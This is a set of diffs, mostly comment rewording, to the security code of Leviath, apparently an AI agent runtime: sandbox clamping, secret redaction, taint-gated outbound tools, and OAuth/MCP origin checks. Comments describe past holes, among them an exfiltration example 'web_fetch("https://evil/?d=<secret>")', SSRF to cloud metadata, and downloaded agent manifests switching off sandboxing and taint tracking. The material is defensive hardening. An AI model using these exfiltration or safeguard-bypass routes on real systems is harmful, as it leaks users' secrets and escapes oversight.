@@ -200,7 +200,7 @@ impl ToolSandboxConfig {
 /// is set. Mirrors [`crate::taint::resolve_security`].
 ///
 /// **A blueprint cannot turn off a sandbox the user turned on.** The `agent` and
-/// `stage` configs come from `agent.leviath` — a downloaded file — so when the
+/// `stage` configs come from `agent.leviath` - a downloaded file - so when the
 /// user's global config asks for isolation, a manifest asking for
 /// [`SandboxKind::None`] is ignored and the global stands. A manifest may still
 /// *choose a different isolated kind* (a stage that wants its own container
@@ -212,7 +212,7 @@ pub fn resolve_sandbox(
     stage: Option<&ToolSandboxConfig>,
 ) -> ToolSandboxConfig {
     // A manifest never chooses the engine, whether or not the user configured a
-    // sandbox at all — see `without_manifest_engine`.
+    // sandbox at all - see `without_manifest_engine`.
     let narrowest = stage
         .or(agent)
         .map(ToolSandboxConfig::without_manifest_engine);
@@ -241,7 +241,7 @@ mod tests {
     }
 
     /// A manifest naming its own `engine` executed that binary on the **host**
-    /// at sandbox-build time — before the first inference, so before any prompt.
+    /// at sandbox-build time - before the first inference, so before any prompt.
     /// Clamping only against a user who had *pinned* an engine missed the
     /// ordinary case, since auto-detection is the default.
     #[test]
@@ -288,7 +288,7 @@ mod tests {
     /// `is_active()` treats both isolating kinds alike, but they are not:
     /// `namespace` shares the host root filesystem. A manifest trading a user's
     /// `container` for `namespace` passed the "still sandboxed" check and got
-    /// read/write on the real `$HOME` — including
+    /// read/write on the real `$HOME` - including
     /// `~/.leviath/providers/*.rhai`, which the runtime later executes.
     #[test]
     fn a_manifest_cannot_trade_a_container_for_a_namespace() {
@@ -313,7 +313,7 @@ mod tests {
             "and the user's pinned image stands"
         );
 
-        // Strengthening is still allowed -- this is a floor, not a pin.
+        // Strengthening is still allowed - this is a floor, not a pin.
         let user = ToolSandboxConfig {
             kind: SandboxKind::Namespace,
             ..Default::default()
@@ -535,7 +535,7 @@ mod tests {
         assert_eq!(r.kind, SandboxKind::Container);
     }
 
-    /// It may still opt *in* when the user set nothing — that only tightens.
+    /// It may still opt *in* when the user set nothing - that only tightens.
     #[test]
     fn manifest_may_opt_into_a_sandbox_the_user_did_not_set() {
         let agent = ToolSandboxConfig {

--- a/crates/leviath-core/src/secrets.rs
+++ b/crates/leviath-core/src/secrets.rs
@@ -54,7 +54,7 @@ pub fn constant_time_eq(a: &str, b: &str) -> bool {
 /// token, a meaningful fraction of the value.
 ///
 /// Counts **characters**, not bytes. `value.len() - 4` can land inside a
-/// multi-byte character and panic (the shape of issue #115), and a 5-byte
+/// multi-byte character and panic, and a 5-byte
 /// 2-character value is longer than 4 *bytes*, so a byte-based length check
 /// would print the whole thing behind four stars.
 #[must_use]
@@ -263,9 +263,9 @@ mod tests {
         }
     }
 
-    /// Issue #115: a byte-based cut lands inside a multi-byte character and
-    /// panics, and a byte-length guard calls a short multi-byte value "long"
-    /// and prints all of it.
+    /// A byte-based cut lands inside a multi-byte character and panics, and a
+    /// byte-length guard calls a short multi-byte value "long" and prints all
+    /// of it.
     #[test]
     fn redact_counts_characters_not_bytes() {
         assert_eq!(redact("日本語日本語日本語"), "****語日本語");

--- a/crates/leviath-core/src/secrets.rs
+++ b/crates/leviath-core/src/secrets.rs
@@ -5,14 +5,14 @@
 //! 1. **What does a child process inherit?** ([`child_env_allowed`]) We are
 //!    *choosing what to hand over*, so an allowlist is right. A denylist here has
 //!    to enumerate every secret name in the ecosystem and loses the moment a new
-//!    one appears — which is exactly what happened: the MCP spawner's substring
+//!    one appears - which is exactly what happened: the MCP spawner's substring
 //!    denylist passed `AWS_SECRET_ACCESS_KEY` (it matches neither `API_SECRET`
 //!    nor `SECRET_KEY`), `GITHUB_TOKEN`, `NPM_TOKEN`, `DATABASE_URL`, and
 //!    Leviath's own `LEVIATH_API_TOKEN`.
 //!
 //! 2. **May a script read *this named* variable?** ([`is_sensitive_env_name`]) A
-//!    script asks for one name it already knows. An allowlist cannot work — no
-//!    fixed list covers every legitimate variable a provider script might read —
+//!    script asks for one name it already knows. An allowlist cannot work - no
+//!    fixed list covers every legitimate variable a provider script might read -
 //!    so the rule inverts: anything that *looks like* a credential is refused
 //!    unless the user allowlisted it, and everything else is fine.
 //!
@@ -48,7 +48,7 @@ pub fn constant_time_eq(a: &str, b: &str) -> bool {
 /// The **one** redaction policy for the workspace. There were two, and they
 /// disagreed about which end of the value to keep: the HTTP logger showed the
 /// last four, the setup wizard the first eight. Two answers to "how much of a
-/// secret is safe to print" means neither is a policy — and a prefix is the
+/// secret is safe to print" means neither is a policy - and a prefix is the
 /// wrong half to keep, because API keys are structured at the front:
 /// `sk-ant-a…`, `sk-proj-…`, `ghp_…` all identify the issuer and, for a short
 /// token, a meaningful fraction of the value.
@@ -74,7 +74,7 @@ pub fn redact(value: &str) -> String {
 ///
 /// A substring match rather than an exact-name list. The list version named
 /// `authorization`, `x-api-key` and `api-key`, and therefore logged Gemini's
-/// `x-goog-api-key` **in full** under `--features debug-http` — the one
+/// `x-goog-api-key` **in full** under `--features debug-http` - the one
 /// provider whose header did not happen to be on it. A denylist of exact names
 /// has to be complete to be correct, and this one was not; matching on the
 /// shape of the name fails safe as new headers appear.
@@ -92,7 +92,7 @@ pub fn is_secret_header(name: &str) -> bool {
 /// like a terminal program; it does not need the ambient credentials of whoever
 /// started the daemon. Anything else a server legitimately requires is declared
 /// in its own `env` block in config, which is applied *after* this filter and so
-/// always wins — that is the supported way to pass a server its token.
+/// always wins - that is the supported way to pass a server its token.
 const CHILD_ENV_ALLOWLIST: &[&str] = &[
     // Finding and running programs.
     "PATH",
@@ -210,7 +210,7 @@ pub fn is_sensitive_env_name(name: &str) -> bool {
 
 /// Whether a script may read `name`, given the user's `[security] allow_env_vars`.
 ///
-/// Non-credential names pass freely — a script reading `PATH`, `TZ`, or its own
+/// Non-credential names pass freely - a script reading `PATH`, `TZ`, or its own
 /// app's config variable is ordinary. A credential-shaped name passes only if the
 /// user listed it, which is them saying "yes, this agent is meant to have that".
 /// Matching the allowlist is case-insensitive and exact; no wildcards, because
@@ -236,7 +236,7 @@ mod tests {
         assert!(constant_time_eq("", ""));
         assert!(!constant_time_eq("secret", "secreu"));
         // Differing at the very first byte and at the very last must both be
-        // false — the loop does not short-circuit either way.
+        // false - the loop does not short-circuit either way.
         assert!(!constant_time_eq("Xecret", "secret"));
         assert!(!constant_time_eq("secreX", "secret"));
         // Length mismatch is refused before indexing.
@@ -254,7 +254,7 @@ mod tests {
         assert!(!redact("ghp_realgithubtoken").contains("ghp_"));
     }
 
-    /// A short value is hidden entirely — four visible characters out of eight
+    /// A short value is hidden entirely - four visible characters out of eight
     /// is most of it.
     #[test]
     fn redact_hides_short_values_completely() {
@@ -397,7 +397,7 @@ mod tests {
     fn child_allowlist_is_the_short_list_not_the_environment() {
         assert!(child_env_allowed("PATH"));
         assert!(child_env_allowed("LANG"));
-        // Not sensitive, but still not a child's business by default — the point
+        // Not sensitive, but still not a child's business by default - the point
         // of an allowlist is that unknown names are excluded, not just secret
         // ones. A server that needs it declares it in its own `env` block.
         assert!(!child_env_allowed("MY_APP_REGION"));

--- a/crates/leviath-core/src/taint.rs
+++ b/crates/leviath-core/src/taint.rs
@@ -427,16 +427,16 @@ pub enum GateDecisionSource {
 /// Built-in tool classification defaults.
 ///
 /// The taint gate only fires on tools classified [`ToolDirection::Outbound`], so
-/// this table decides what data-flow enforcement can see at all. It used to mark
-/// **only** `shell`/`bash` as outbound, which meant a Private-tainted context
-/// could be exfiltrated by `web_fetch("https://evil/?d=<secret>")` with taint
-/// tracking fully enabled - along with any MCP tool and any script tool, all of
-/// which fell through to the internal/internal default and were never gated.
+/// this table decides what data-flow enforcement can see at all. Anything that
+/// can carry bytes off the machine must be outbound: marking **only**
+/// `shell`/`bash` would let a Private-tainted context be exfiltrated by
+/// `web_fetch("https://evil/?d=<secret>")` with taint tracking fully enabled -
+/// along with any MCP tool and any script tool, which an internal/internal
+/// fallback would never gate.
 ///
-/// Anything that can carry bytes off the machine is outbound now, and the
-/// fallback for an *unknown* tool is outbound too. An unrecognized tool is
+/// The fallback for an *unknown* tool is outbound too. An unrecognized tool is
 /// usually an MCP or script tool - third-party code reaching a third-party
-/// service - so treating it as internal was assuming the safest case about the
+/// service - so an internal default would assume the safest case about the
 /// least-known code. Failing closed costs a prompt; failing open costs the data.
 pub fn builtin_tool_classification(tool_name: &str) -> ToolClassification {
     match tool_name {

--- a/crates/leviath-core/src/taint.rs
+++ b/crates/leviath-core/src/taint.rs
@@ -3,7 +3,7 @@
 //! Every piece of data entering a context region carries a sensitivity tag.
 //! When an agent attempts an outbound action, the system checks whether
 //! the data flowing into that action exceeds the tool's clearance level.
-//! Taint levels are deterministic — set by the runtime based on tool
+//! Taint levels are deterministic - set by the runtime based on tool
 //! declarations and user policy, never by model output.
 
 use serde::{Deserialize, Serialize};
@@ -245,7 +245,7 @@ impl RegionTaint {
     /// Rebuild from a persisted list of per-entry taints.
     ///
     /// `current_level` is derived rather than stored, so a restored region ends
-    /// up at exactly the level its entries justify — and recovers as they evict,
+    /// up at exactly the level its entries justify - and recovers as they evict,
     /// the same as one that was never persisted.
     pub fn from_entry_taints(entry_taints: Vec<TaintLevel>) -> Self {
         let current_level = entry_taints
@@ -283,7 +283,7 @@ impl Default for SecurityConfig {
         // so the struct default is taint-on; a manifest with no block at all
         // yields `None`, which callers must resolve through
         // [`resolve_security`]/[`resolve_taint_enabled`] (default off). Do NOT
-        // use `unwrap_or_default()` on an optional agent/global config — that
+        // use `unwrap_or_default()` on an optional agent/global config - that
         // conflates "no block" with "empty block" and forces taint on
         // everywhere; cascade through the global setting instead.
         Self {
@@ -299,7 +299,7 @@ impl Default for SecurityConfig {
 /// agent configs come from `agent.leviath`, so if a manifest could set
 /// `taint_tracking = false` over a user's global `true`, installing an agent
 /// would be enough to disable the machine's data-flow enforcement. A manifest
-/// that wants tracking when the user has it off is still honored — that
+/// that wants tracking when the user has it off is still honored - that
 /// direction only tightens.
 pub fn resolve_taint_enabled(
     global: bool,
@@ -316,7 +316,7 @@ pub fn resolve_taint_enabled(
 /// present config (stage over agent), or a default whose `taint_tracking`
 /// follows the global toggle when neither level configures it.
 ///
-/// `taint_tracking` is clamped by [`resolve_taint_enabled`] so the two agree —
+/// `taint_tracking` is clamped by [`resolve_taint_enabled`] so the two agree -
 /// a manifest cannot disable what the user enabled.
 pub fn resolve_security(
     global: bool,
@@ -342,12 +342,12 @@ pub fn resolve_batch_tool_hint(global: bool, agent: Option<bool>, stage: Option<
     stage.or(agent).unwrap_or(global)
 }
 
-/// Result of a gate check — whether a tool invocation is allowed.
+/// Result of a gate check - whether a tool invocation is allowed.
 #[derive(Debug, Clone, PartialEq, Eq)]
 pub enum GateDecision {
-    /// Taint level is within clearance — proceed.
+    /// Taint level is within clearance - proceed.
     Allowed,
-    /// Taint level exceeds clearance — gate fires.
+    /// Taint level exceeds clearance - gate fires.
     Blocked {
         /// The taint level that caused the block.
         taint_level: TaintLevel,
@@ -402,9 +402,9 @@ pub struct GateEvent {
 /// How a gate decision was reached.
 #[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)]
 pub enum GateDecisionSource {
-    /// Taint was within clearance — automatic allow.
+    /// Taint was within clearance - automatic allow.
     AutoAllow,
-    /// Taint exceeded clearance — automatic block, before any user decision.
+    /// Taint exceeded clearance - automatic block, before any user decision.
     AutoBlock,
     /// Matched a static allowlist rule.
     AllowlistRule { rule_index: usize },
@@ -416,7 +416,7 @@ pub enum GateDecisionSource {
     UserAlwaysAllow,
     /// User denied the action.
     UserDenied,
-    /// Taint tracking is disabled — automatic allow.
+    /// Taint tracking is disabled - automatic allow.
     TaintDisabled,
     /// Auto-approved by `--yolo`: the gate would have blocked, but the agent
     /// runs unattended so enforcement is waived. Recorded (rather than silently
@@ -430,13 +430,13 @@ pub enum GateDecisionSource {
 /// this table decides what data-flow enforcement can see at all. It used to mark
 /// **only** `shell`/`bash` as outbound, which meant a Private-tainted context
 /// could be exfiltrated by `web_fetch("https://evil/?d=<secret>")` with taint
-/// tracking fully enabled — along with any MCP tool and any script tool, all of
+/// tracking fully enabled - along with any MCP tool and any script tool, all of
 /// which fell through to the internal/internal default and were never gated.
 ///
 /// Anything that can carry bytes off the machine is outbound now, and the
 /// fallback for an *unknown* tool is outbound too. An unrecognized tool is
-/// usually an MCP or script tool — third-party code reaching a third-party
-/// service — so treating it as internal was assuming the safest case about the
+/// usually an MCP or script tool - third-party code reaching a third-party
+/// service - so treating it as internal was assuming the safest case about the
 /// least-known code. Failing closed costs a prompt; failing open costs the data.
 pub fn builtin_tool_classification(tool_name: &str) -> ToolClassification {
     match tool_name {
@@ -489,8 +489,8 @@ pub fn builtin_tool_classification(tool_name: &str) -> ToolClassification {
         }
         // An unknown tool is almost always an MCP or Rhai script tool:
         // third-party code, usually talking to a third-party service. Treat it
-        // as outbound so the gate sees it. `ToolClassification::default()` —
-        // internal/internal — assumed the safest case about the least-known
+        // as outbound so the gate sees it. `ToolClassification::default()` -
+        // internal/internal - assumed the safest case about the least-known
         // code, and left every MCP and script tool ungated.
         _ => ToolClassification::new(
             TaintLevel::Public,
@@ -505,7 +505,7 @@ mod tests {
     use super::*;
 
     /// Taint was not persisted at all, so every restart, resume or page-in
-    /// brought a region back `Public` while the gate reported itself armed —
+    /// brought a region back `Public` while the gate reported itself armed -
     /// silently unblocking outbound tools it had been blocking.
     #[test]
     fn taint_rebuilds_from_persisted_entries_at_the_highest_level() {
@@ -948,7 +948,7 @@ mod tests {
         assert_eq!(tc.direction, ToolDirection::Internal);
     }
 
-    /// An unknown tool is almost always MCP or a Rhai script — third-party code
+    /// An unknown tool is almost always MCP or a Rhai script - third-party code
     /// talking to a third-party service. It fails closed. The old default was
     /// internal/internal, which assumed the safest case about the least-known
     /// code and left every MCP and script tool ungated.
@@ -992,9 +992,9 @@ mod tests {
 
     #[test]
     fn resolve_taint_enabled_agent_may_opt_in_but_not_out() {
-        // Global off, agent opts in — honored, that only tightens.
+        // Global off, agent opts in - honored, that only tightens.
         assert!(resolve_taint_enabled(false, Some(&sec(true)), None));
-        // Global on, agent tries to opt out — refused. `agent.leviath` is a
+        // Global on, agent tries to opt out - refused. `agent.leviath` is a
         // downloaded file; letting it disable the machine's data-flow
         // enforcement made taint tracking opt-out-by-installing-an-agent.
         assert!(resolve_taint_enabled(true, Some(&sec(false)), None));
@@ -1051,7 +1051,7 @@ mod tests {
         assert!(!resolve_security(false, None, None).taint_tracking);
         // Stage present → wins over agent for opting *in*.
         assert!(resolve_security(false, Some(&sec(false)), Some(&sec(true))).taint_tracking);
-        // An agent opt-out cannot beat the user's global on — `resolve_security`
+        // An agent opt-out cannot beat the user's global on - `resolve_security`
         // agrees with `resolve_taint_enabled` rather than disagreeing with it.
         assert!(resolve_security(true, Some(&sec(false)), None).taint_tracking);
     }

--- a/crates/leviath-core/src/text.rs
+++ b/crates/leviath-core/src/text.rs
@@ -5,7 +5,7 @@
 //! script-tool I/O caps, ACP frame chunking, region seed truncation, dashboard
 //! column fitting, log previews. Every one of those had grown its own
 //! `while !s.is_char_boundary(end) { end -= 1 }` loop with its own comment
-//! explaining why — and two sites (`lev test`'s response preview and `lev
+//! explaining why - and two sites (`lev test`'s response preview and `lev
 //! setup`'s key redactor) never grew one at all and panicked on any emoji.
 //!
 //! That is the shape of issues #109 and #115: a byte cut-off through a flag
@@ -30,10 +30,10 @@ pub fn floor_char_boundary(s: &str, max: usize) -> usize {
 /// `&s[..max]`, backed off to the nearest char boundary at or before `max`.
 ///
 /// Returns all of `s` when `max` reaches the end. Callers append their own
-/// ellipsis or truncation marker — this only cuts.
+/// ellipsis or truncation marker - this only cuts.
 #[expect(
     clippy::string_slice,
-    reason = "floor_char_boundary returns a char boundary by construction — this is the one raw \
+    reason = "floor_char_boundary returns a char boundary by construction - this is the one raw \
               slice the rest of the workspace defers to"
 )]
 pub fn truncate_at_boundary(s: &str, max: usize) -> &str {
@@ -76,7 +76,7 @@ mod tests {
     fn floor_char_boundary_clamps_and_walks_back() {
         // Past the end clamps to the length.
         assert_eq!(floor_char_boundary("abc", 99), 3);
-        // Already a boundary — unchanged.
+        // Already a boundary - unchanged.
         assert_eq!(floor_char_boundary("abc", 2), 2);
         // Zero is always a boundary, so no walk-back happens.
         assert_eq!(floor_char_boundary("日本語", 0), 0);

--- a/crates/leviath-core/src/text.rs
+++ b/crates/leviath-core/src/text.rs
@@ -8,9 +8,9 @@
 //! explaining why - and two sites (`lev test`'s response preview and `lev
 //! setup`'s key redactor) never grew one at all and panicked on any emoji.
 //!
-//! That is the shape of issues #109 and #115: a byte cut-off through a flag
-//! emoji inside a Rhai host function, which double-panicked and aborted the
-//! whole daemon. Keeping the walk-back in one tested place means a new
+//! That failure has happened for real: a byte cut-off through a flag emoji
+//! inside a Rhai host function double-panicked and aborted the whole daemon.
+//! Keeping the walk-back in one tested place means a new
 //! truncation site cannot forget it. The workspace also denies
 //! `clippy::string_slice`, so reaching for a raw `&s[..n]` instead of these
 //! helpers is a compile error unless the boundary is proven at the call site.

--- a/crates/leviath-mcp/Cargo.toml
+++ b/crates/leviath-mcp/Cargo.toml
@@ -10,7 +10,7 @@ authors.workspace = true
 # crates. Saying so explicitly prevents an accidental `cargo publish` and lets
 # cargo-deny treat the intra-workspace `path` dependencies as what they are
 # rather than as unbounded version requirements. Remove this line if a crate is
-# ever meant to be published — at which point its path deps need versions too.
+# ever meant to be published - at which point its path deps need versions too.
 publish = false
 
 [dependencies]

--- a/crates/leviath-mcp/src/auth/metadata.rs
+++ b/crates/leviath-mcp/src/auth/metadata.rs
@@ -44,7 +44,7 @@ pub(crate) struct AuthServerMetadata {
 #[expect(
     clippy::string_slice,
     reason = "`start` is a `find` hit plus the length of the ASCII needle it matched, and `end` is \
-              a `find` hit or the length — all char boundaries"
+              a `find` hit or the length - all char boundaries"
 )]
 pub(crate) fn resource_metadata_url(www_authenticate: Option<&str>) -> Option<String> {
     let header = www_authenticate?;
@@ -94,8 +94,8 @@ pub(crate) fn is_safe_discovery_url(url: &Url) -> bool {
 /// Whether two URLs share an origin (scheme, host, and effective port).
 ///
 /// Used to bind a server-supplied `resource_metadata` URL to the MCP server that
-/// offered it. That URL arrives in a `WWW-Authenticate` header — entirely under
-/// the remote server's control — and was previously fetched with no check at
+/// offered it. That URL arrives in a `WWW-Authenticate` header - entirely under
+/// the remote server's control - and was previously fetched with no check at
 /// all, which made every MCP connection an SSRF primitive pointed at whatever
 /// the server named, including cloud metadata endpoints.
 pub(crate) fn same_origin(a: &Url, b: &Url) -> bool {

--- a/crates/leviath-mcp/src/auth/metadata.rs
+++ b/crates/leviath-mcp/src/auth/metadata.rs
@@ -95,9 +95,9 @@ pub(crate) fn is_safe_discovery_url(url: &Url) -> bool {
 ///
 /// Used to bind a server-supplied `resource_metadata` URL to the MCP server that
 /// offered it. That URL arrives in a `WWW-Authenticate` header - entirely under
-/// the remote server's control - and was previously fetched with no check at
-/// all, which made every MCP connection an SSRF primitive pointed at whatever
-/// the server named, including cloud metadata endpoints.
+/// the remote server's control - so fetching it unchecked makes every MCP
+/// connection an SSRF primitive pointed at whatever the server names,
+/// including cloud metadata endpoints.
 pub(crate) fn same_origin(a: &Url, b: &Url) -> bool {
     a.scheme() == b.scheme()
         && a.host() == b.host()
@@ -190,7 +190,7 @@ mod tests {
         );
     }
 
-    // A bad issuer no longer reaches this function: it takes an already-parsed
+    // A bad issuer cannot reach this function: it takes an already-parsed
     // `Url`, so the caller reports an unparseable issuer and this cannot be
     // handed one. `login_refuses_metadata_with_an_unparseable_issuer` in
     // `auth::tests` covers that path end to end.

--- a/crates/leviath-mcp/src/auth/mod.rs
+++ b/crates/leviath-mcp/src/auth/mod.rs
@@ -140,7 +140,7 @@ impl OAuthClient {
         // open, and the user needs to paste it themselves.
         println!("Opening your browser to authorize:\n  {authorize_url}");
         if !(*opener)(authorize_url.as_str()) {
-            println!("(couldn't open a browser automatically — open the link above)");
+            println!("(couldn't open a browser automatically - open the link above)");
         }
 
         let code = wait_for_callback(listener, &pkce.state, CALLBACK_TIMEOUT).await?;
@@ -218,7 +218,7 @@ impl OAuthClient {
     }
 
     /// [`authorization_header`](Self::authorization_header) reading and writing
-    /// grants through `credentials` -- the OS credential store, when
+    /// grants through `credentials` - the OS credential store, when
     /// `[security] credential_store = "keychain"` is set.
     ///
     /// `None` is the file backend. A refreshed token is written back through the
@@ -272,7 +272,7 @@ impl OAuthClient {
         // to the MCP server's own origin: a server may point at its own metadata
         // document, which is the legitimate use, and may not point at anything
         // else. Without this, connecting to a hostile MCP server was enough to
-        // make Leviath fetch an arbitrary URL — cloud metadata included.
+        // make Leviath fetch an arbitrary URL - cloud metadata included.
         let resource_meta_url = match hinted {
             Some(hint) => {
                 let parsed = Url::parse(&hint)
@@ -280,7 +280,7 @@ impl OAuthClient {
                 if !metadata::same_origin(&parsed, mcp) {
                     anyhow::bail!(
                         "MCP server at {mcp} pointed resource_metadata at a different origin \
-                         ({parsed}) — refusing to follow it"
+                         ({parsed}) - refusing to follow it"
                     );
                 }
                 parsed
@@ -327,7 +327,7 @@ impl OAuthClient {
     ///
     /// The returned document is validated against `issuer` before use. RFC 8414
     /// §3.3 requires the `issuer` in the metadata to match the one that was
-    /// requested, and this never checked — so a hostile
+    /// requested, and this never checked - so a hostile
     /// `authorization_servers[0]` in the resource document could redirect the
     /// entire flow to an attacker's authorization server and harvest the code.
     async fn fetch_auth_server_metadata(&self, issuer: &str) -> anyhow::Result<AuthServerMetadata> {
@@ -361,8 +361,8 @@ impl OAuthClient {
     ///
     /// 1. The document's own `issuer` matches the one requested (RFC 8414 §3.3).
     /// 2. The authorization and token endpoints share the issuer's origin, so a
-    ///    valid-looking document cannot send the user's browser — and the
-    ///    resulting code — somewhere else.
+    ///    valid-looking document cannot send the user's browser - and the
+    ///    resulting code - somewhere else.
     /// 3. Both endpoints are safe to use at all (https, or loopback).
     fn validate_auth_server_metadata(
         &self,
@@ -380,7 +380,7 @@ impl OAuthClient {
             if !metadata::same_origin(&claimed, issuer_url) {
                 anyhow::bail!(
                     "authorization server metadata claims issuer '{}' but was fetched for \
-                     '{issuer}' — refusing (RFC 8414 §3.3)",
+                     '{issuer}' - refusing (RFC 8414 §3.3)",
                     meta.issuer
                 );
             }
@@ -395,7 +395,7 @@ impl OAuthClient {
             self.require_safe_discovery_url(&parsed)?;
             if !metadata::same_origin(&parsed, issuer_url) {
                 anyhow::bail!(
-                    "{label} '{endpoint}' is not on the issuer's origin ('{issuer}') — refusing"
+                    "{label} '{endpoint}' is not on the issuer's origin ('{issuer}') - refusing"
                 );
             }
         }
@@ -704,14 +704,14 @@ async fn handle_callback_connection(
     }
     match (params.get("code"), params.get("state")) {
         // Constant-time: the state is 128 bits of fresh entropy over loopback, so
-        // a timing oracle here is theoretical — but it was the one secret
+        // a timing oracle here is theoretical - but it was the one secret
         // comparison in the codebase still using `==`, and "theoretical" is not
         // a reason for the comparison to differ from every other one.
         (Some(code), Some(state)) if leviath_core::constant_time_eq(state, expected_state) => {
             write_response(
                 &mut stream,
                 "200 OK",
-                "Authorization complete — you can close this tab and return to Leviath.",
+                "Authorization complete - you can close this tab and return to Leviath.",
             )
             .await;
             Ok(Some(code.clone()))
@@ -724,7 +724,7 @@ async fn handle_callback_connection(
                 "Invalid authorization state.",
             )
             .await;
-            Err(anyhow::anyhow!("OAuth state mismatch — rejecting callback"))
+            Err(anyhow::anyhow!("OAuth state mismatch - rejecting callback"))
         }
         _ => {
             write_response(
@@ -1006,7 +1006,7 @@ mod tests {
     #[tokio::test]
     async fn handle_callback_ignores_an_empty_connection() {
         // A connection that sends nothing yields no request line, so it is
-        // neither the callback nor an error — just skipped.
+        // neither the callback nor an error - just skipped.
         let listener = TcpListener::bind("127.0.0.1:0").await.unwrap();
         let addr = listener.local_addr().unwrap();
         let accept = tokio::spawn(async move {
@@ -1188,8 +1188,8 @@ mod tests {
         let authorize = match variant {
             "bad_authorize" => "not a url".to_string(),
             // A valid URL on somebody else's origin: the shape a hostile
-            // document uses to send the user's browser — and the resulting
-            // authorization code — somewhere the issuer does not control.
+            // document uses to send the user's browser - and the resulting
+            // authorization code - somewhere the issuer does not control.
             "foreign_endpoint" => "https://evil.example.com/authorize".to_string(),
             // Remote *http*: refused for the scheme before the origin check
             // even runs.
@@ -1205,7 +1205,7 @@ mod tests {
             // is the AS document's own `issuer` field.
             "as_unparseable_issuer" => "not a url".to_string(),
             // Omitted entirely. The RFC 8414 §3.3 cross-check is skipped rather
-            // than failing, since there is nothing to compare — the endpoint
+            // than failing, since there is nothing to compare - the endpoint
             // origin check below still applies.
             "no_issuer_field" => String::new(),
             _ => base.to_string(),
@@ -1882,7 +1882,7 @@ mod tests {
 
     /// A hostile MCP server pointing `resource_metadata` at somebody else's
     /// origin. The URL comes out of a `WWW-Authenticate` header the server
-    /// controls entirely, and used to be fetched with no validation at all —
+    /// controls entirely, and used to be fetched with no validation at all -
     /// so connecting to a malicious server was enough to make Leviath issue a
     /// request to any URL from inside the user's network.
     #[tokio::test]
@@ -1981,7 +1981,7 @@ mod tests {
     }
 
     /// An `authorization_endpoint` that parses fine but sits on somebody else's
-    /// origin — where the user's browser, and the code it comes back with,
+    /// origin - where the user's browser, and the code it comes back with,
     /// would go.
     #[tokio::test]
     async fn login_refuses_an_endpoint_off_the_issuers_origin() {
@@ -2003,7 +2003,7 @@ mod tests {
     }
 
     /// A document that omits `issuer` skips the §3.3 cross-check rather than
-    /// failing it — there is nothing to compare against. The endpoint-origin
+    /// failing it - there is nothing to compare against. The endpoint-origin
     /// check still applies, so this is a narrowing, not a bypass: the login
     /// proceeds normally.
     #[tokio::test]
@@ -2114,7 +2114,7 @@ mod tests {
             .await
             .expect_err("a bad authorize endpoint must fail");
         // Caught during metadata validation now, which runs before the URL is
-        // built — so the message names the field rather than the later
+        // built - so the message names the field rather than the later
         // build-the-authorize-URL step. Earlier is better: the endpoint never
         // reaches the browser opener.
         assert!(

--- a/crates/leviath-mcp/src/auth/mod.rs
+++ b/crates/leviath-mcp/src/auth/mod.rs
@@ -1882,9 +1882,9 @@ mod tests {
 
     /// A hostile MCP server pointing `resource_metadata` at somebody else's
     /// origin. The URL comes out of a `WWW-Authenticate` header the server
-    /// controls entirely, and used to be fetched with no validation at all -
-    /// so connecting to a malicious server was enough to make Leviath issue a
-    /// request to any URL from inside the user's network.
+    /// controls entirely; fetching it without validation means connecting to
+    /// a malicious server is enough to make Leviath issue a request to any
+    /// URL from inside the user's network.
     #[tokio::test]
     async fn login_refuses_a_cross_origin_resource_metadata_hint() {
         // A server whose 401 points at a *different* origin. The target does not

--- a/crates/leviath-mcp/src/auth/pkce.rs
+++ b/crates/leviath-mcp/src/auth/pkce.rs
@@ -49,7 +49,7 @@ mod tests {
     #[test]
     fn verifier_is_within_the_spec_length_range() {
         // RFC 7636 §4.1: 43–128 characters. `len` is bound first so the
-        // assertion message captures a variable rather than a second call —
+        // assertion message captures a variable rather than a second call -
         // otherwise that call is a region only ever reached on failure.
         let len = Pkce::generate().verifier.len();
         assert!(

--- a/crates/leviath-mcp/src/auth/store.rs
+++ b/crates/leviath-mcp/src/auth/store.rs
@@ -44,7 +44,7 @@ pub struct ServerAuth {
 /// Hand-written so the access and refresh tokens can never be printed.
 ///
 /// These are live credentials for a third-party server, and this struct is
-/// carried through error paths that format their context — one `{:?}` would put
+/// carried through error paths that format their context - one `{:?}` would put
 /// them in the logs. The endpoints and expiry are the useful part of a debug
 /// line anyway.
 impl std::fmt::Debug for ServerAuth {
@@ -201,7 +201,7 @@ impl AuthStore {
         let content =
             serde_json::to_string_pretty(&to_write).expect("AuthStore is always serializable");
         // `write_private`, not `fs::write` + `chmod`. The two-step version left
-        // this file — access *and refresh* tokens for every MCP server — at the
+        // this file - access *and refresh* tokens for every MCP server - at the
         // umask default (typically 0644) between the write and the mode change,
         // so every save had a moment where any local user could read it.
         leviath_sys::write_private(path, content.as_bytes())
@@ -212,7 +212,7 @@ impl AuthStore {
     /// The default store path, honoring `LEVIATH_HOME` like every other
     /// home-relative path this workspace uses.
     ///
-    /// `None` when no home directory can be resolved and no override is set —
+    /// `None` when no home directory can be resolved and no override is set -
     /// the same shape the CLI's own home resolver returns, so the caller
     /// decides how to report a missing home rather than this silently picking
     /// a surprising fallback.
@@ -257,7 +257,7 @@ impl AuthStore {
 /// Ensure the directory holding `path` exists.
 ///
 /// A path with no parent, or an empty-string parent (a bare filename), needs
-/// no directory created — those collapse to a no-op so the caller has a single
+/// no directory created - those collapse to a no-op so the caller has a single
 /// fallible step to reason about.
 fn create_parent_dir(path: &Path) -> anyhow::Result<()> {
     match path.parent() {
@@ -271,8 +271,8 @@ fn create_parent_dir(path: &Path) -> anyhow::Result<()> {
 ///
 /// This used to be a local copy that read `LEVIATH_HOME` as the `.leviath`
 /// directory *itself*, while the CLI reads it as the user home and appends
-/// `.leviath`. With the override set — which is how every test and every
-/// sandboxed run works — the OAuth token store therefore landed in a different
+/// `.leviath`. With the override set - which is how every test and every
+/// sandboxed run works - the OAuth token store therefore landed in a different
 /// directory from the config naming those very servers. The default
 /// (`~/.leviath/mcp-auth.json`) is unchanged.
 fn leviath_home() -> Option<PathBuf> {
@@ -323,7 +323,7 @@ mod tests {
         assert_eq!(auth.refresh_token.as_deref(), Some("rt-SECRET"));
         assert_eq!(loaded.keychain_server_names(), ["github"]);
 
-        // Without the store, the tokens are simply absent -- not fabricated.
+        // Without the store, the tokens are simply absent - not fabricated.
         let blind = AuthStore::load_with(&path, None).unwrap();
         assert!(blind.get("github").is_none());
     }
@@ -350,7 +350,7 @@ mod tests {
     }
 
     /// A server listed in the index whose credential is no longer in the store
-    /// leaves the user logged out of that one server -- not with a fabricated
